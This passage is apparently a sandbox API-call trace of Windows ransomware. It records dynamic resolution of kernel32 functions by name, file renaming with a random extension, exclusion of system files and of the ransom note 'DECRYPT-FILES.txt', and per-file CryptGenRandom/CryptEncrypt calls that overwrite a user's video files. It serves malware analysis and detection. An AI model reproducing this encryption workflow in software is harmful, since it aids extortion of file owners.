returned="CreateProcessInternalW" [0083.082] lstrlenA (lpString="CREATEPROCESSINTERNALW") returned 22 [0083.082] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CreateProcessW" | out: lpString1="CreateProcessW") returned="CreateProcessW" [0083.082] lstrlenA (lpString="CREATEPROCESSW") returned 14 [0083.082] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CreateRemoteThread" | out: lpString1="CreateRemoteThread") returned="CreateRemoteThread" [0083.082] lstrlenA (lpString="CREATEREMOTETHREAD") returned 18 [0083.082] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CreateRemoteThreadEx" | out: lpString1="CreateRemoteThreadEx") returned="CreateRemoteThreadEx" [0083.082] lstrlenA (lpString="CREATEREMOTETHREADEX") returned 20 [0083.082] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CreateSemaphoreA" | out: lpString1="CreateSemaphoreA") returned="CreateSemaphoreA" [0083.082] lstrlenA (lpString="CREATESEMAPHOREA") returned 16 [0083.082] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CreateSemaphoreExA" | out: lpString1="CreateSemaphoreExA") returned="CreateSemaphoreExA" [0083.082] lstrlenA (lpString="CREATESEMAPHOREEXA") returned 18 [0083.082] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CreateSemaphoreExW" | out: lpString1="CreateSemaphoreExW") returned="CreateSemaphoreExW" [0083.082] lstrlenA (lpString="CREATESEMAPHOREEXW") returned 18 [0083.082] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CreateSemaphoreW" | out: lpString1="CreateSemaphoreW") returned="CreateSemaphoreW" [0083.082] lstrlenA (lpString="CREATESEMAPHOREW") returned 16 [0083.083] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CreateSocketHandle" | out: lpString1="CreateSocketHandle") returned="CreateSocketHandle" [0083.083] lstrlenA (lpString="CREATESOCKETHANDLE") returned 18 [0083.083] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CreateSymbolicLinkA" | out: lpString1="CreateSymbolicLinkA") returned="CreateSymbolicLinkA" [0083.083] lstrlenA (lpString="CREATESYMBOLICLINKA") returned 19 [0083.083] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CreateSymbolicLinkTransactedA" | out: lpString1="CreateSymbolicLinkTransactedA") returned="CreateSymbolicLinkTransactedA" [0083.083] lstrlenA (lpString="CREATESYMBOLICLINKTRANSACTEDA") returned 29 [0083.083] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CreateSymbolicLinkTransactedW" | out: lpString1="CreateSymbolicLinkTransactedW") returned="CreateSymbolicLinkTransactedW" [0083.083] lstrlenA (lpString="CREATESYMBOLICLINKTRANSACTEDW") returned 29 [0083.083] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CreateSymbolicLinkW" | out: lpString1="CreateSymbolicLinkW") returned="CreateSymbolicLinkW" [0083.083] lstrlenA (lpString="CREATESYMBOLICLINKW") returned 19 [0083.083] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CreateTapePartition" | out: lpString1="CreateTapePartition") returned="CreateTapePartition" [0083.083] lstrlenA (lpString="CREATETAPEPARTITION") returned 19 [0083.083] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CreateThread" | out: lpString1="CreateThread") returned="CreateThread" [0083.083] lstrlenA (lpString="CREATETHREAD") returned 12 [0083.083] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CreateThreadpool" | out: lpString1="CreateThreadpool") returned="CreateThreadpool" [0083.083] lstrlenA (lpString="CREATETHREADPOOL") returned 16 [0083.083] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CreateThreadpoolCleanupGroup" | out: lpString1="CreateThreadpoolCleanupGroup") returned="CreateThreadpoolCleanupGroup" [0083.083] lstrlenA (lpString="CREATETHREADPOOLCLEANUPGROUP") returned 28 [0083.083] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CreateThreadpoolIo" | out: lpString1="CreateThreadpoolIo") returned="CreateThreadpoolIo" [0083.083] lstrlenA (lpString="CREATETHREADPOOLIO") returned 18 [0083.083] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CreateThreadpoolTimer" | out: lpString1="CreateThreadpoolTimer") returned="CreateThreadpoolTimer" [0083.083] lstrlenA (lpString="CREATETHREADPOOLTIMER") returned 21 [0083.083] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CreateThreadpoolWait" | out: lpString1="CreateThreadpoolWait") returned="CreateThreadpoolWait" [0083.083] lstrlenA (lpString="CREATETHREADPOOLWAIT") returned 20 [0083.083] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CreateThreadpoolWork" | out: lpString1="CreateThreadpoolWork") returned="CreateThreadpoolWork" [0083.083] lstrlenA (lpString="CREATETHREADPOOLWORK") returned 20 [0083.083] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CreateTimerQueue" | out: lpString1="CreateTimerQueue") returned="CreateTimerQueue" [0083.083] lstrlenA (lpString="CREATETIMERQUEUE") returned 16 [0083.083] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CreateTimerQueueTimer" | out: lpString1="CreateTimerQueueTimer") returned="CreateTimerQueueTimer" [0083.083] lstrlenA (lpString="CREATETIMERQUEUETIMER") returned 21 [0083.083] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CreateToolhelp32Snapshot" | out: lpString1="CreateToolhelp32Snapshot") returned="CreateToolhelp32Snapshot" [0083.083] lstrlenA (lpString="CREATETOOLHELP32SNAPSHOT") returned 24 [0083.083] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CreateWaitableTimerA" | out: lpString1="CreateWaitableTimerA") returned="CreateWaitableTimerA" [0083.083] lstrlenA (lpString="CREATEWAITABLETIMERA") returned 20 [0083.083] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CreateWaitableTimerExA" | out: lpString1="CreateWaitableTimerExA") returned="CreateWaitableTimerExA" [0083.084] lstrlenA (lpString="CREATEWAITABLETIMEREXA") returned 22 [0083.084] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CreateWaitableTimerExW" | out: lpString1="CreateWaitableTimerExW") returned="CreateWaitableTimerExW" [0083.084] lstrlenA (lpString="CREATEWAITABLETIMEREXW") returned 22 [0083.084] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CreateWaitableTimerW" | out: lpString1="CreateWaitableTimerW") returned="CreateWaitableTimerW" [0083.084] lstrlenA (lpString="CREATEWAITABLETIMERW") returned 20 [0083.084] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CtrlRoutine" | out: lpString1="CtrlRoutine") returned="CtrlRoutine" [0083.084] lstrlenA (lpString="CTRLROUTINE") returned 11 [0083.084] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="DeactivateActCtx" | out: lpString1="DeactivateActCtx") returned="DeactivateActCtx" [0083.084] lstrlenA (lpString="DEACTIVATEACTCTX") returned 16 [0083.084] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="DebugActiveProcess" | out: lpString1="DebugActiveProcess") returned="DebugActiveProcess" [0083.084] lstrlenA (lpString="DEBUGACTIVEPROCESS") returned 18 [0083.084] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="DebugActiveProcessStop" | out: lpString1="DebugActiveProcessStop") returned="DebugActiveProcessStop" [0083.084] lstrlenA (lpString="DEBUGACTIVEPROCESSSTOP") returned 22 [0083.084] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="DebugBreak" | out: lpString1="DebugBreak") returned="DebugBreak" [0083.084] lstrlenA (lpString="DEBUGBREAK") returned 10 [0083.084] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="DebugBreakProcess" | out: lpString1="DebugBreakProcess") returned="DebugBreakProcess" [0083.084] lstrlenA (lpString="DEBUGBREAKPROCESS") returned 17 [0083.084] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="DebugSetProcessKillOnExit" | out: lpString1="DebugSetProcessKillOnExit") returned="DebugSetProcessKillOnExit" [0083.084] lstrlenA (lpString="DEBUGSETPROCESSKILLONEXIT") returned 25 [0083.084] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="DecodePointer" | out: lpString1="DecodePointer") returned="DecodePointer" [0083.084] lstrlenA (lpString="DECODEPOINTER") returned 13 [0083.084] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="DecodeSystemPointer" | out: lpString1="DecodeSystemPointer") returned="DecodeSystemPointer" [0083.084] lstrlenA (lpString="DECODESYSTEMPOINTER") returned 19 [0083.084] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="DefineDosDeviceA" | out: lpString1="DefineDosDeviceA") returned="DefineDosDeviceA" [0083.084] lstrlenA (lpString="DEFINEDOSDEVICEA") returned 16 [0083.084] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="DefineDosDeviceW" | out: lpString1="DefineDosDeviceW") returned="DefineDosDeviceW" [0083.084] lstrlenA (lpString="DEFINEDOSDEVICEW") returned 16 [0083.084] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="DelayLoadFailureHook" | out: lpString1="DelayLoadFailureHook") returned="DelayLoadFailureHook" [0083.084] lstrlenA (lpString="DELAYLOADFAILUREHOOK") returned 20 [0083.084] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="DeleteAtom" | out: lpString1="DeleteAtom") returned="DeleteAtom" [0083.084] lstrlenA (lpString="DELETEATOM") returned 10 [0083.084] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="DeleteBoundaryDescriptor" | out: lpString1="DeleteBoundaryDescriptor") returned="DeleteBoundaryDescriptor" [0083.084] lstrlenA (lpString="DELETEBOUNDARYDESCRIPTOR") returned 24 [0083.084] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="DeleteCriticalSection" | out: lpString1="DeleteCriticalSection") returned="DeleteCriticalSection" [0083.085] lstrlenA (lpString="DELETECRITICALSECTION") returned 21 [0083.085] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="DeleteFiber" | out: lpString1="DeleteFiber") returned="DeleteFiber" [0083.085] lstrlenA (lpString="DELETEFIBER") returned 11 [0083.085] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="DeleteFileA" | out: lpString1="DeleteFileA") returned="DeleteFileA" [0083.085] lstrlenA (lpString="DELETEFILEA") returned 11 [0083.085] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="DeleteFileTransactedA" | out: lpString1="DeleteFileTransactedA") returned="DeleteFileTransactedA" [0083.085] lstrlenA (lpString="DELETEFILETRANSACTEDA") returned 21 [0083.085] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="DeleteFileTransactedW" | out: lpString1="DeleteFileTransactedW") returned="DeleteFileTransactedW" [0083.085] lstrlenA (lpString="DELETEFILETRANSACTEDW") returned 21 [0083.085] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="DeleteFileW" | out: lpString1="DeleteFileW") returned="DeleteFileW" [0083.085] lstrlenA (lpString="DELETEFILEW") returned 11 [0083.085] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="DeleteProcThreadAttributeList" | out: lpString1="DeleteProcThreadAttributeList") returned="DeleteProcThreadAttributeList" [0083.085] lstrlenA (lpString="DELETEPROCTHREADATTRIBUTELIST") returned 29 [0083.085] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="DeleteTimerQueue" | out: lpString1="DeleteTimerQueue") returned="DeleteTimerQueue" [0083.085] lstrlenA (lpString="DELETETIMERQUEUE") returned 16 [0083.085] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="DeleteTimerQueueEx" | out: lpString1="DeleteTimerQueueEx") returned="DeleteTimerQueueEx" [0083.085] lstrlenA (lpString="DELETETIMERQUEUEEX") returned 18 [0083.085] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="DeleteTimerQueueTimer" | out: lpString1="DeleteTimerQueueTimer") returned="DeleteTimerQueueTimer" [0083.085] lstrlenA (lpString="DELETETIMERQUEUETIMER") returned 21 [0083.085] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="DeleteVolumeMountPointA" | out: lpString1="DeleteVolumeMountPointA") returned="DeleteVolumeMountPointA" [0083.085] lstrlenA (lpString="DELETEVOLUMEMOUNTPOINTA") returned 23 [0083.085] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="DeleteVolumeMountPointW" | out: lpString1="DeleteVolumeMountPointW") returned="DeleteVolumeMountPointW" [0083.085] lstrlenA (lpString="DELETEVOLUMEMOUNTPOINTW") returned 23 [0083.085] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="DeviceIoControl" | out: lpString1="DeviceIoControl") returned="DeviceIoControl" [0083.085] lstrlenA (lpString="DEVICEIOCONTROL") returned 15 [0083.085] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="DisableThreadLibraryCalls" | out: lpString1="DisableThreadLibraryCalls") returned="DisableThreadLibraryCalls" [0083.085] lstrlenA (lpString="DISABLETHREADLIBRARYCALLS") returned 25 [0083.085] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="DisableThreadProfiling" | out: lpString1="DisableThreadProfiling") returned="DisableThreadProfiling" [0083.085] lstrlenA (lpString="DISABLETHREADPROFILING") returned 22 [0083.085] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="DisassociateCurrentThreadFromCallback" | out: lpString1="DisassociateCurrentThreadFromCallback") returned="DisassociateCurrentThreadFromCallback" [0083.085] lstrlenA (lpString="DISASSOCIATECURRENTTHREADFROMCALLBACK") returned 37 [0083.085] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="DisconnectNamedPipe" | out: lpString1="DisconnectNamedPipe") returned="DisconnectNamedPipe" [0083.085] lstrlenA (lpString="DISCONNECTNAMEDPIPE") returned 19 [0083.085] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="DnsHostnameToComputerNameA" | out: lpString1="DnsHostnameToComputerNameA") returned="DnsHostnameToComputerNameA" [0083.085] lstrlenA (lpString="DNSHOSTNAMETOCOMPUTERNAMEA") returned 26 [0083.085] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="DnsHostnameToComputerNameW" | out: lpString1="DnsHostnameToComputerNameW") returned="DnsHostnameToComputerNameW" [0083.086] lstrlenA (lpString="DNSHOSTNAMETOCOMPUTERNAMEW") returned 26 [0083.086] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="DosDateTimeToFileTime" | out: lpString1="DosDateTimeToFileTime") returned="DosDateTimeToFileTime" [0083.086] lstrlenA (lpString="DOSDATETIMETOFILETIME") returned 21 [0083.086] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="DosPathToSessionPathA" | out: lpString1="DosPathToSessionPathA") returned="DosPathToSessionPathA" [0083.086] lstrlenA (lpString="DOSPATHTOSESSIONPATHA") returned 21 [0083.086] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="DosPathToSessionPathW" | out: lpString1="DosPathToSessionPathW") returned="DosPathToSessionPathW" [0083.086] lstrlenA (lpString="DOSPATHTOSESSIONPATHW") returned 21 [0083.086] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="DuplicateConsoleHandle" | out: lpString1="DuplicateConsoleHandle") returned="DuplicateConsoleHandle" [0083.086] lstrlenA (lpString="DUPLICATECONSOLEHANDLE") returned 22 [0083.086] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="DuplicateHandle" | out: lpString1="DuplicateHandle") returned="DuplicateHandle" [0083.086] lstrlenA (lpString="DUPLICATEHANDLE") returned 15 [0083.086] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="EnableThreadProfiling" | out: lpString1="EnableThreadProfiling") returned="EnableThreadProfiling" [0083.086] lstrlenA (lpString="ENABLETHREADPROFILING") returned 21 [0083.086] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="EncodePointer" | out: lpString1="EncodePointer") returned="EncodePointer" [0083.086] lstrlenA (lpString="ENCODEPOINTER") returned 13 [0083.086] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="EncodeSystemPointer" | out: lpString1="EncodeSystemPointer") returned="EncodeSystemPointer" [0083.086] lstrlenA (lpString="ENCODESYSTEMPOINTER") returned 19 [0083.086] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="EndUpdateResourceA" | out: lpString1="EndUpdateResourceA") returned="EndUpdateResourceA" [0083.086] lstrlenA (lpString="ENDUPDATERESOURCEA") returned 18 [0083.086] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="EndUpdateResourceW" | out: lpString1="EndUpdateResourceW") returned="EndUpdateResourceW" [0083.086] lstrlenA (lpString="ENDUPDATERESOURCEW") returned 18 [0083.086] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="EnterCriticalSection" | out: lpString1="EnterCriticalSection") returned="EnterCriticalSection" [0083.086] lstrlenA (lpString="ENTERCRITICALSECTION") returned 20 [0083.086] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="EnumCalendarInfoA" | out: lpString1="EnumCalendarInfoA") returned="EnumCalendarInfoA" [0083.086] lstrlenA (lpString="ENUMCALENDARINFOA") returned 17 [0083.086] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="EnumCalendarInfoExA" | out: lpString1="EnumCalendarInfoExA") returned="EnumCalendarInfoExA" [0083.086] lstrlenA (lpString="ENUMCALENDARINFOEXA") returned 19 [0083.086] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="EnumCalendarInfoExEx" | out: lpString1="EnumCalendarInfoExEx") returned="EnumCalendarInfoExEx" [0083.086] lstrlenA (lpString="ENUMCALENDARINFOEXEX") returned 20 [0083.086] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="EnumCalendarInfoExW" | out: lpString1="EnumCalendarInfoExW") returned="EnumCalendarInfoExW" [0083.086] lstrlenA (lpString="ENUMCALENDARINFOEXW") returned 19 [0083.086] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="EnumCalendarInfoW" | out: lpString1="EnumCalendarInfoW") returned="EnumCalendarInfoW" [0083.086] lstrlenA (lpString="ENUMCALENDARINFOW") returned 17 [0083.086] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="EnumDateFormatsA" | out: lpString1="EnumDateFormatsA") returned="EnumDateFormatsA" [0083.086] lstrlenA (lpString="ENUMDATEFORMATSA") returned 16 [0083.086] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="EnumDateFormatsExA" | out: lpString1="EnumDateFormatsExA") returned="EnumDateFormatsExA" [0083.086] lstrlenA (lpString="ENUMDATEFORMATSEXA") returned 18 [0083.087] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="EnumDateFormatsExEx" | out: lpString1="EnumDateFormatsExEx") returned="EnumDateFormatsExEx" [0083.087] lstrlenA (lpString="ENUMDATEFORMATSEXEX") returned 19 [0083.087] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="EnumDateFormatsExW" | out: lpString1="EnumDateFormatsExW") returned="EnumDateFormatsExW" [0083.087] lstrlenA (lpString="ENUMDATEFORMATSEXW") returned 18 [0083.087] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="EnumDateFormatsW" | out: lpString1="EnumDateFormatsW") returned="EnumDateFormatsW" [0083.087] lstrcpyW (in: lpString1=0x10d0000, lpString2="qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM1234567890" | out: lpString1="qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM1234567890") returned="qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM1234567890" [0083.087] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\ggFLb 9Aa\\H1MiMyXALwnG6yS6\\L8u5GZutaYG7tB7HCgdf.flv") returned 89 [0083.087] wsprintfW (in: param_1=0x3f2dc28, param_2="%s.%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\ggFLb 9Aa\\H1MiMyXALwnG6yS6\\L8u5GZutaYG7tB7HCgdf.flv.A9pDQ") returned 95 [0083.087] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\ggFLb 9Aa\\H1MiMyXALwnG6yS6\\L8u5GZutaYG7tB7HCgdf.flv" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\ggflb 9aa\\h1mimyxalwng6ys6\\l8u5gzutayg7tb7hcgdf.flv"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\ggFLb 9Aa\\H1MiMyXALwnG6yS6\\L8u5GZutaYG7tB7HCgdf.flv.A9pDQ" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\ggflb 9aa\\h1mimyxalwng6ys6\\l8u5gzutayg7tb7hcgdf.flv.a9pdq"), dwFlags=0x0) returned 1 [0083.088] VirtualFree (lpAddress=0xfc0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0083.088] VirtualFree (lpAddress=0x10d0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0083.088] VirtualFree (lpAddress=0xfb0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0083.088] FindNextFileW (in: hFindFile=0x5f8c98, lpFindFileData=0x3f2ec58 | out: lpFindFileData=0x3f2ec58*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xf6076f10, ftCreationTime.dwHighDateTime=0x1d4c62c, ftLastAccessTime.dwLowDateTime=0x209898c0, ftLastAccessTime.dwHighDateTime=0x1d4d592, ftLastWriteTime.dwLowDateTime=0x209898c0, ftLastWriteTime.dwHighDateTime=0x1d4d592, nFileSizeHigh=0x0, nFileSizeLow=0x42f8, dwReserved0=0x0, dwReserved1=0x0, cFileName="W6Py.mp4", cAlternateFileName="")) returned 1 [0083.088] lstrcmpiW (lpString1="W6Py.mp4", lpString2="DECRYPT-FILES.txt") returned 1 [0083.088] lstrcmpiW (lpString1="W6Py.mp4", lpString2="autorun.inf") returned 1 [0083.088] lstrcmpiW (lpString1="W6Py.mp4", lpString2="boot.ini") returned 1 [0083.088] lstrcmpiW (lpString1="W6Py.mp4", lpString2="desktop.ini") returned 1 [0083.088] lstrcmpiW (lpString1="W6Py.mp4", lpString2="ntuser.dat") returned 1 [0083.089] lstrcmpiW (lpString1="W6Py.mp4", lpString2="iconcache.db") returned 1 [0083.089] lstrcmpiW (lpString1="W6Py.mp4", lpString2="bootsect.bak") returned 1 [0083.089] lstrcmpiW (lpString1="W6Py.mp4", lpString2="ntuser.dat.log") returned 1 [0083.089] lstrcmpiW (lpString1="W6Py.mp4", lpString2="thumbs.db") returned 1 [0083.089] lstrcmpiW (lpString1="W6Py.mp4", lpString2="Bootfont.bin") returned 1 [0083.089] lstrlenW (lpString="W6Py.mp4") returned 8 [0083.089] lstrcmpiW (lpString1="mp4", lpString2="lnk") returned 1 [0083.089] lstrcmpiW (lpString1="mp4", lpString2="exe") returned 1 [0083.089] lstrcmpiW (lpString1="mp4", lpString2="sys") returned -1 [0083.089] lstrcmpiW (lpString1="mp4", lpString2="dll") returned 1 [0083.089] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\ggFLb 9Aa\\H1MiMyXALwnG6yS6\\") returned 65 [0083.089] lstrlenW (lpString="W6Py.mp4") returned 8 [0083.089] lstrcpyW (in: lpString1=0x3f2e428, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\ggFLb 9Aa\\H1MiMyXALwnG6yS6\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\ggFLb 9Aa\\H1MiMyXALwnG6yS6\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\ggFLb 9Aa\\H1MiMyXALwnG6yS6\\" [0083.089] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\ggFLb 9Aa\\H1MiMyXALwnG6yS6\\", lpString2="W6Py.mp4" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\ggFLb 9Aa\\H1MiMyXALwnG6yS6\\W6Py.mp4") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\ggFLb 9Aa\\H1MiMyXALwnG6yS6\\W6Py.mp4" [0083.089] VirtualAlloc (lpAddress=0x0, dwSize=0x28, flAllocationType=0x3000, flProtect=0x4) returned 0xfb0000 [0083.089] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\ggFLb 9Aa\\H1MiMyXALwnG6yS6\\W6Py.mp4" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\ggflb 9aa\\h1mimyxalwng6ys6\\w6py.mp4"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x448 [0083.089] GetFileSizeEx (in: hFile=0x448, lpFileSize=0x3f2dbf0 | out: lpFileSize=0x3f2dbf0*=17144) returned 1 [0083.089] CreateFileMappingW (hFile=0x448, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x44c [0083.089] MapViewOfFile (hFileMappingObject=0x44c, dwDesiredAccess=0x2, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x0) returned 0xfc0000 [0083.090] CryptGenRandom (in: hProv=0x61eb40, dwLen=0x20, pbBuffer=0xfb0000 | out: pbBuffer=0xfb0000) returned 1 [0083.090] CryptGenRandom (in: hProv=0x61eb40, dwLen=0x8, pbBuffer=0xfb0020 | out: pbBuffer=0xfb0020) returned 1 [0083.090] VirtualAlloc (lpAddress=0x0, dwSize=0x108, flAllocationType=0x3000, flProtect=0x4) returned 0x10d0000 [0083.090] CryptEncrypt (in: hKey=0x5f8a98, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x10d0000*, pdwDataLen=0x3f2db58*=0x28, dwBufLen=0x100 | out: pbData=0x10d0000*, pdwDataLen=0x3f2db58*=0x100) returned 1 [0083.090] VirtualAlloc (lpAddress=0x0, dwSize=0x1001, flAllocationType=0x3000, flProtect=0x4) returned 0x10e0000 [0083.091] VirtualFree (lpAddress=0x10e0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0083.091] UnmapViewOfFile (lpBaseAddress=0xfc0000) returned 1 [0083.091] CloseHandle (hObject=0x44c) returned 1 [0083.091] SetFilePointerEx (in: hFile=0x448, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0083.092] WriteFile (in: hFile=0x448, lpBuffer=0x10d0000*, nNumberOfBytesToWrite=0x108, lpNumberOfBytesWritten=0x3f2db78, lpOverlapped=0x0 | out: lpBuffer=0x10d0000*, lpNumberOfBytesWritten=0x3f2db78*=0x108, lpOverlapped=0x0) returned 1 [0083.092] CloseHandle (hObject=0x0) returned 0 [0083.092] CloseHandle (hObject=0x448) returned 1 [0083.092] VirtualFree (lpAddress=0x10d0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0083.093] VirtualFree (lpAddress=0xfb0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0083.093] GetTickCount () returned 0x114d3e3 [0083.093] VirtualAlloc (lpAddress=0x0, dwSize=0x18, flAllocationType=0x3000, flProtect=0x4) returned 0xfb0000 [0083.093] lstrlenW (lpString="qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM1234567890") returned 62 [0083.093] VirtualAlloc (lpAddress=0x0, dwSize=0xc, flAllocationType=0x3000, flProtect=0x4) returned 0xfc0000 [0083.093] VirtualAlloc (lpAddress=0x0, dwSize=0x7e, flAllocationType=0x3000, flProtect=0x4) returned 0x10d0000 [0083.094] lstrlenA (lpString="kernel32.dll") returned 12 [0083.094] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x76c20000 [0083.094] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="AcquireSRWLockExclusive" | out: lpString1="AcquireSRWLockExclusive") returned="AcquireSRWLockExclusive" [0083.094] lstrlenA (lpString="ACQUIRESRWLOCKEXCLUSIVE") returned 23 [0083.094] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="AcquireSRWLockShared" | out: lpString1="AcquireSRWLockShared") returned="AcquireSRWLockShared" [0083.094] lstrlenA (lpString="ACQUIRESRWLOCKSHARED") returned 20 [0083.094] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="ActivateActCtx" | out: lpString1="ActivateActCtx") returned="ActivateActCtx" [0083.094] lstrlenA (lpString="ACTIVATEACTCTX") returned 14 [0083.094] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="AddAtomA" | out: lpString1="AddAtomA") returned="AddAtomA" [0083.094] lstrlenA (lpString="ADDATOMA") returned 8 [0083.094] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="AddAtomW" | out: lpString1="AddAtomW") returned="AddAtomW" [0083.094] lstrlenA (lpString="ADDATOMW") returned 8 [0083.094] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="AddConsoleAliasA" | out: lpString1="AddConsoleAliasA") returned="AddConsoleAliasA" [0083.094] lstrlenA (lpString="ADDCONSOLEALIASA") returned 16 [0083.094] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="AddConsoleAliasW" | out: lpString1="AddConsoleAliasW") returned="AddConsoleAliasW" [0083.094] lstrlenA (lpString="ADDCONSOLEALIASW") returned 16 [0083.094] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="AddIntegrityLabelToBoundaryDescriptor" | out: lpString1="AddIntegrityLabelToBoundaryDescriptor") returned="AddIntegrityLabelToBoundaryDescriptor" [0083.094] 